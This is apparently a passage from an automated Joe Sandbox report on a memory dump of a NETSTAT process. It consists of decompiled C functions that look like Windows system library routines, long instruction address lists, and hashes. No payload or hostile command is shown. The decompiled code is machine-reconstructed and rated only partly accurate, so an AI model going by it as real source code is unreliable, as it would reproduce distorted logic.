															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x2f57b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x2f57b84 = _t75;
						_t73 = E02E7EB70(_t134, 0x2f57b60);
						if( *0x2f57b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E02E7FF60( *0x2f57b20);
							}
						}
						goto L5;
					}
				}
			}

0x02e9fab0
0x02e9fab2
0x02e9fab3
0x02e9fab4
0x02e9fabc
0x02e9fac0
0x02e9fb14
0x02e9fb17
0x02e9fac2
0x02e9fac8
0x02e9facd
0x02e9fad3
0x02e9fad3
0x02e9fadd
0x02e9fb18
0x02e9fb1b
0x02e9fb1d
0x02e9fb1e
0x02e9fb1f
0x02e9fb20
0x02e9fb21
0x02e9fb22
0x02e9fb23
0x02e9fb24
0x02e9fb25
0x02e9fb26
0x02e9fb27
0x02e9fb28
0x02e9fb29
0x02e9fb2a
0x02e9fb2b
0x02e9fb2c
0x02e9fb2d
0x02e9fb2e
0x02e9fb2f
0x02e9fb3a
0x02e9fb3b
0x02e9fb3e
0x02e9fb41
0x02e9fb44
0x02e9fb47
0x02e9fb4a
0x02e9fb4d
0x02e9fb53
0x02edbdcb
0x02edbdcb
0x02e9fb59
0x02e9fb5b
0x02e9fb5b
0x02e9fb5e
0x02edbdd5
0x02edbdd8
0x00000000
0x02edbdda
0x00000000
0x02edbdda
0x02e9fb64
0x02e9fb64
0x02e9fb64
0x02e9fb67
0x02e9fb6e
0x02e9fb70
0x02e9fb72
0x00000000
0x02e9fb78
0x02e9fb7a
0x02e9fb7a
0x02e9fb7d
0x02e9fb80
0x02edbddf
0x02edbde1
0x00000000
0x02edbde3
0x00000000
0x02edbde3
0x02e9fb86
0x02e9fb86
0x02e9fb86
0x02e9fb8b
0x02e9fb90
0x02e9fb92
0x02e9fb94
0x02e9fb9a
0x02e9fb9b
0x02e9fba1
0x02edbde8
0x02edbdeb
0x02edbded
0x02edbeb5
0x02edbeb5
0x02edbebb
0x02edbebd
0x02edbec3
0x02edbed2
0x02edbedd
0x02edbedd
0x02edbeed
0x00000000
0x02edbdf3
0x02edbdfe
0x02edbe06
0x02edbe0b
0x02edbe0d
0x02edbe0f
0x02edbe14
0x02edbe19
0x02edbe20
0x02edbe25
0x02edbe27
0x02edbe35
0x02edbe39
0x02edbe46
0x02edbe4f
0x02edbe54
0x02edbe56
0x02edbef8
0x02edbef8
0x00000000
0x02edbe5c
0x02edbe5c
0x02edbe60
0x00000000
0x02edbe66
0x02edbe66
0x02edbe7f
0x02edbe84
0x02edbe87
0x02edbe89
0x02edbe8b
0x02edbe99
0x02edbe9d
0x02edbea0
0x02edbeac
0x02edbeaf
0x02edbeb1
0x02edbeb3
0x02edbeb3
0x00000000
0x02edbea2
0x02edbea2
0x00000000
0x02edbea2
0x02edbe8d
0x02edbe8d
0x02edbe92
0x00000000
0x02edbe92
0x02edbe8b
0x02edbe60
0x02edbe3b
0x02edbe3b
0x02edbe3e
0x00000000
0x02edbe40
0x02edbe40
0x02edbe44
0x00000000
0x00000000
0x00000000
0x00000000
0x02edbe44
0x02edbe3e
0x02edbe29
0x02edbe29
0x00000000
0x02edbe29
0x02edbe27
0x00000000
0x02e9fba7
0x02e9fba7
0x02e9fbab
0x02edbf02
0x02e9fbb1
0x02e9fbb1
0x02e9fbb8
0x02e9fbbd
0x02e9fbbd
0x02e9fbbf
0x02e9fbbf
0x02e9fbc5
0x02e9fbcb
0x02e9fbf8
0x02e9fbf8
0x02e9fbfa
0x00000000
0x02e9fc00
0x02e9fc00
0x02e9fc03
0x00000000
0x02e9fc09
0x02e9fc09
0x02e9fc0f
0x02e9fc15
0x02e9fc23
0x02e9fc23
0x02e9fc25
0x02e9fc27
0x02e9fc75
0x02e9fc7c
0x02e9fc84
0x00000000
0x02e9fc29
0x02e9fc29
0x02e9fc2d
0x02e9fc30
0x02edbf0f
0x00000000
0x02e9fc36
0x02e9fc38
0x02e9fc3b
0x02e9fc41
0x02edbf17
0x02edbf19
0x02edbf48
0x02edbf4b
0x00000000
0x02edbf1b
0x02edbf22
0x02edbf24
0x02edbf26
0x00000000
0x02edbf2c
0x02edbf37
0x02edbf39
0x02edbf3b
0x00000000
0x02edbf41
0x02edbf41
0x02edbf41
0x02edbf41
0x02edbf45
0x00000000
0x02edbf45
0x02edbf3b
0x02edbf26
0x00000000
0x02e9fc47
0x02e9fc47
0x02e9fc49
0x02e9fcb2
0x02e9fcb4
0x02e9fcb6
0x02e9fcdc
0x02e9fcdc
0x00000000
0x02e9fcb8
0x02e9fcc3
0x02e9fcc5
0x02e9fcc7
0x00000000
0x02e9fcc9
0x02e9fcc9
0x02e9fccd
0x00000000
0x02e9fccd
0x02e9fcc7
0x00000000
0x02e9fc4b
0x02e9fc4b
0x02e9fc4e
0x02e9fc4e
0x02e9fc51
0x02e9fc51
0x02e9fc54
0x02e9fc5a
0x02e9fc5c
0x02e9fc5f
0x02e9fc61
0x02e9fc63
0x02e9fc65
0x02e9fc67
0x02e9fc6e
0x02e9fc72
0x02e9fc72
0x02e9fc72
0x02e9fc72
0x02e9fc67
0x02e9fc61
0x00000000
0x02e9fc5a
0x02e9fc49
0x02e9fc41
0x02e9fc30
0x02e9fc27
0x02e9fc03
0x02e9fbcd
0x02e9fbd3
0x02e9fbd9
0x02e9fbdc
0x02e9fbde
0x02e9fc99
0x02e9fc9b
0x02e9fc9d
0x02e9fcd5
0x02e9fcd5
0x02e9fc89
0x02e9fc89
0x00000000
0x02e9fc9f
0x02e9fc9f
0x02e9fca3
0x00000000
0x02e9fca3
0x00000000
0x02e9fbe4
0x02e9fbe4
0x02e9fbe4
0x02e9fbe4
0x02e9fbe9
0x02e9fbf2
0x00000000
0x02e9fbf2
0x02e9fbde
0x02e9fbcb
0x02e9fbab
0x02e9fc8b
0x02e9fc8b
0x02e9fc8c
0x02e9fb80
0x02e9fb72
0x02e9fb5e
0x02e9fc8d
0x02e9fc91
0x02e9fadf
0x02e9fadf
0x02e9fae1
0x02e9fae4
0x02e9fae7
0x02e9faec
0x02e9faf8
0x02e9fb00
0x02e9fb07
0x02e9fb0f
0x02e9fb0f
0x02e9fb07
0x00000000
0x02e9faf8
0x02e9fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 02EDBE0F
(1?, xrefs: 02E9FAF1

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID: (1?$*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-3791283482
Opcode ID: 90b303fee7ec0ae3a0ef2b4c243a93f57829f0258d2f71e134afca0e1275061d
Instruction ID: b7afb4c9a9f0671a366746f7edeae854a077ee364f28bc44e748c6c2d2da9f8c
Opcode Fuzzy Hash: 90b303fee7ec0ae3a0ef2b4c243a93f57829f0258d2f71e134afca0e1275061d
Instruction Fuzzy Hash: 2BA1F331B806069BDB25DF68C4507EAB3A5AF4971CF05D56EE906DBA80EB30D842CB94

Uniqueness

Uniqueness Score: -1.00%

Function 02F2E539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E02F2E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E02F2BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E02F2BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E02F2AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E02EA9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E02F2A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E02F2A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E02EA9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E02F2A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E02F2A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E02E82280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E02E7B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E02E7FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E02E87D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E02F1FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x02f2e547
0x02f2e549
0x02f2e54f
0x02f2e553
0x02f2e557
0x02f2e55a
0x02f2e55c
0x02f2e55f
0x02f2e561
0x02f2e567
0x02f2e56b
0x02f2e7e2
0x00000000
0x02f2e571
0x02f2e575
0x02f2e577
0x02f2e57b
0x02f2e57c
0x02f2e57d
0x02f2e57e
0x02f2e57f
0x02f2e588
0x02f2e58f
0x02f2e591
0x02f2e592
0x02f2e592
0x02f2e596
0x02f2e59e
0x02f2e5a0
0x02f2e5a6
0x02f2e61d
0x02f2e61d
0x02f2e621
0x02f2e623
0x02f2e630
0x02f2e630
0x02f2e7e6
0x02f2e7eb
0x02f2e7ed
0x02f2e7f4
0x02f2e7fa
0x02f2e7ff
0x02f2e7ff
0x02f2e80a
0x02f2e812
0x02f2e812
0x02f2e5ab
0x02f2e5b4
0x02f2e5b9
0x02f2e5be
0x02f2e5c0
0x02f2e5c2
0x02f2e5c8
0x02f2e5c9
0x02f2e5cb
0x02f2e5cc
0x02f2e5d5
0x02f2e5e4
0x02f2e5f1
0x02f2e5f8
0x02f2e5f8
0x02f2e5d5
0x02f2e602
0x02f2e616
0x02f2e63d
0x02f2e644
0x02f2e64d
0x02f2e652
0x02f2e657
0x02f2e659
0x02f2e65b
0x02f2e661
0x02f2e662
0x02f2e664
0x02f2e665
0x02f2e66e
0x02f2e67d
0x02f2e68a
0x02f2e691
0x02f2e691
0x02f2e66e
0x02f2e6b0
0x00000000
0x02f2e6b6
0x02f2e6bd
0x02f2e6c7
0x02f2e6d7
0x02f2e6d9
0x02f2e6db
0x02f2e6de
0x02f2e6e3
0x02f2e6f3
0x02f2e6fc
0x02f2e700
0x02f2e700
0x02f2e704
0x02f2e70a
0x02f2e70a
0x02f2e713
0x02f2e716
0x02f2e719
0x02f2e720
0x02f2e761
0x02f2e76b
0x02f2e774
0x02f2e77a
0x02f2e77a
0x02f2e78a
0x02f2e791
0x02f2e799
0x02f2e79b
0x02f2e79f
0x02f2e7aa
0x02f2e7c0
0x02f2e7ac
0x02f2e7b2
0x02f2e7b9
0x02f2e7b9
0x02f2e7c7
0x02f2e806
0x00000000
0x02f2e7c9
0x02f2e7d1
0x02f2e7d8
0x00000000
0x02f2e7d8
0x00000000
0x00000000
0x02f2e722
0x02f2e72e
0x02f2e748
0x02f2e74c
0x02f2e754
0x02f2e756
0x02f2e75c
0x02f2e75c
0x00000000
0x02f2e75c
0x02f2e758
0x02f2e758
0x00000000
0x02f2e758
0x02f2e750
0x00000000
0x00000000
0x02f2e752
0x00000000
0x02f2e752
0x02f2e730
0x02f2e735
0x02f2e73d
0x02f2e73f
0x00000000
0x00000000
0x02f2e741
0x02f2e741
0x00000000
0x02f2e741
0x02f2e739
0x00000000
0x00000000
0x02f2e73b
0x00000000
0x02f2e73b
0x02f2e722
0x02f2e720
0x02f2e6b0
0x02f2e618
0x00000000
0x02f2e618

Strings

`, xrefs: 02F2E670
`, xrefs: 02F2E5D7

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 04f810e1ea6396a251618ea300985d5fe787de79d266708dfefd4eb4164c62ef
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 009191316043559FE724CE25C841B57B7E6BF85754F24892DFAA9CB280E774E808CF52

Uniqueness

Uniqueness Score: -1.00%

Function 02EE51BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E02EE51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x2f405f0);
				E02EBD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E02E7EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E02EE53CA(0);
						return E02EBD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E02EAF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E02E83690(1, _t117, 0x2e41810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E02EAAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L02E84620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E02EAAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E02EE500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E02EA9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x02ee51be
0x02ee51c3
0x02ee51c8
0x02ee51cd
0x02ee51d0
0x02ee51d3
0x02ee51d8
0x02ee51db
0x02ee51de
0x02ee51e0
0x02ee51e3
0x02ee51e6
0x02ee51e8
0x02ee5342
0x02ee5351
0x02ee5356
0x02ee535a
0x02ee5360
0x02ee5363
0x02ee5366
0x02ee5369
0x02ee5369
0x02ee536b
0x02ee536b
0x02ee5370
0x02ee53a3
0x02ee53a4
0x02ee53a6
0x02ee53ab
0x02ee53ab
0x02ee53ae
0x02ee53ae
0x02ee53b5
0x02ee53bf
0x02ee53bf
0x02ee5375
0x02ee5396
0x02ee53a0
0x02ee53a0
0x00000000
0x02ee5396
0x02ee5377
0x02ee5379
0x02ee537f
0x02ee538c
0x02ee5390
0x00000000
0x02ee5390
0x02ee51ee
0x02ee51f1
0x02ee5301
0x02ee5310
0x02ee5315
0x02ee5318
0x02ee531b
0x02ee5320
0x02ee532e
0x02ee5331
0x00000000
0x02ee5331
0x02ee5328
0x02ee5329
0x00000000
0x02ee5329
0x02ee51fa
0x02ee5235
0x02ee5236
0x02ee5239
0x02ee523f
0x02ee5240
0x02ee5241
0x02ee5242
0x02ee5246
0x02ee5247
0x02ee524e
0x02ee5251
0x02ee5267
0x02ee5269
0x02ee526e
0x02ee527d
0x02ee527e
0x02ee5281
0x02ee5282
0x02ee5287
0x02ee5288
0x02ee528a
0x02ee528f
0x02ee5294
0x00000000
0x00000000
0x02ee529a
0x02ee529c
0x02ee529e
0x02ee529e
0x02ee52a4
0x02ee52b0
0x00000000
0x00000000
0x02ee52ba
0x02ee52bc
0x02ee52bc
0x02ee52d4
0x02ee52d9
0x02ee52dc
0x02ee52e1
0x00000000
0x00000000
0x02ee52e7
0x02ee52f4
0x00000000
0x02ee52f4
0x02ee5270
0x00000000
0x02ee5270
0x02ee51fc
0x02ee51fd
0x02ee5202
0x02ee5203
0x02ee5205
0x02ee520a
0x02ee520f
0x00000000
0x00000000
0x02ee521b
0x02ee5226
0x02ee522b
0x02ee521d
0x02ee521d
0x02ee5222
0x02ee5222
0x02ee522d
0x00000000

Strings

Legacy, xrefs: 02EE5226
UEFI, xrefs: 02EE521D

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 8ae854905c4b9795fd7b414747263051f6aaadf0743bb94f05248e14e6f2bc60
Instruction ID: b0183944896b6e716a67f7cab0b8dde5ea8df494db200aec2859c55364e15e89
Opcode Fuzzy Hash: 8ae854905c4b9795fd7b414747263051f6aaadf0743bb94f05248e14e6f2bc60
Instruction Fuzzy Hash: 48516F71A806089FDF24DFA8D850BADB7F9FF48708F54946EE54AEB251DB719900CB10

Uniqueness

Uniqueness Score: -1.00%

Function 02E6B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E02E6B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x2f3f7a8);
				E02EBD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E02EBD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E02EAD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E02EAF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L02EBDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
